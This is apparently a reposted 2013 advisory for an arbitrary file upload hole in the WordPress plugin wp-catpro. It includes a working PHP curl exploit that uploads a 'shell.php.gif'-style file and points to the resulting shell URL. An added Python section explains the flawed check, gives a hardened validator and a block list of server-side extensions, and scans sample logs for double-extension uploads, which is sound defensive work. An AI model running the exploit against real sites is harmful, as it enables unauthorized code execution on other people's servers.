WordPress plugin wp-catpro arbitrary file upload
Original poster, posted on 2013-2-27 20:12:43
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php

$uploadfile = "zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>

<?php // body of the uploaded zik.php.gif
phpinfo();
?>
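The advisory above boils down to one weak check: the plugin's allowlist only looks at the text after the final dot, and its filename character class permits extra dots, so a name like shell.php.gif is accepted and then served from a directory where some Apache/mod_php configurations execute it. The Python below is an added example written for this page; it is not code from the original post or from the wp-catpro plugin (which is PHP), and the function names, the SERVER_SIDE_EXTENSIONS list, the magic-byte table and the access-log lines are all assumptions or constructed for illustration. It contrasts the last-extension check with a hardened validator (exactly one extension, server-side extension names rejected anywhere in the name, leading bytes matched against the claimed type, server-chosen storage name) and adds a small scanner that flags requests for double-extension files under wp-content/uploads in web-server logs.

```python
import re
import secrets
from pathlib import PurePosixPath
from typing import List, Optional

# Allowlist quoted in the advisory: ("jpg", "gif", "png").
ALLOWED_EXTENSIONS = {"jpg", "gif", "png"}

# Assumed list of extensions that must not appear anywhere in a name, because
# some Apache/mod_php configurations (AddHandler, mod_mime) execute a file
# whose name merely *contains* ".php", e.g. shell.php.gif.
SERVER_SIDE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar",
                          "cgi", "pl", "asp", "aspx", "jsp", "htaccess"}

# Leading bytes of the permitted image types (constructed table).
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
}


def vulnerable_check(filename: str) -> bool:
    """Mirror of the weak logic: only the text after the last dot is examined."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXTENSIONS


def hardened_check(filename: str, content: bytes) -> Optional[str]:
    """Return the canonical extension if the upload is acceptable, else None."""
    # Reject anything carrying directory components or traversal.
    if PurePosixPath(filename).name != filename or "\\" in filename:
        return None
    parts = filename.lower().split(".")
    # Exactly "base.ext": one dot and a non-empty base. shell.php.gif has two dots.
    if len(parts) != 2 or not parts[0]:
        return None
    base, ext = parts
    if ext not in ALLOWED_EXTENSIONS or base in SERVER_SIDE_EXTENSIONS:
        return None
    # Tight character allowlist for the base name (no spaces, quotes, etc.).
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", base):
        return None
    # The bytes must match the claimed type; a PHP payload in a .gif fails here.
    if not any(content.startswith(m) for m in MAGIC[ext]):
        return None
    return ext


def storage_name(ext: str) -> str:
    """Server-chosen on-disk name: random token plus the single validated extension."""
    return f"{secrets.token_hex(16)}.{ext}"


# Detection side: flag requests for double-extension files under uploads.
REQUEST_PATH = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INNER_SERVER_EXT = re.compile(
    r"\.(?:" + "|".join(sorted(SERVER_SIDE_EXTENSIONS)) + r")\.[a-z0-9]+$", re.I)


def suspicious_upload_requests(log_lines: List[str]) -> List[str]:
    """Return request paths under /wp-content/uploads/ that look like x.php.gif."""
    hits = []
    for line in log_lines:
        m = REQUEST_PATH.search(line)
        if not m:
            continue
        path = m.group(1).split("?", 1)[0]
        if "/wp-content/uploads/" in path and INNER_SERVER_EXT.search(path):
            hits.append(path)
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Feb/2013:20:12:43 +0800] "POST /wp-content/plugins/wp-catpro/js/swfupload/js/upload.php HTTP/1.1" 200 51',
    '203.0.113.5 - - [27/Feb/2013:20:12:44 +0800] "GET /wp-content/uploads/catpro/zik.php.gif HTTP/1.1" 200 4096',
    '198.51.100.9 - - [27/Feb/2013:20:13:01 +0800] "GET /wp-content/uploads/2013/02/photo.gif HTTP/1.1" 200 8123',
]

if __name__ == "__main__":
    print(vulnerable_check("zik.php.gif"))           # True: the weak check accepts it
    print(hardened_check("zik.php.gif", b"GIF89a"))   # None: rejected on the double extension
    print(suspicious_upload_requests(SAMPLE_LOG))     # the one double-extension request
```

The single-dot rule is deliberately stricter than filtering a blacklist of inner extensions: it removes the whole class of parser disagreements between the upload handler and the web server rather than chasing individual handler names, and the random storage name means the client never chooses what ends up on disk.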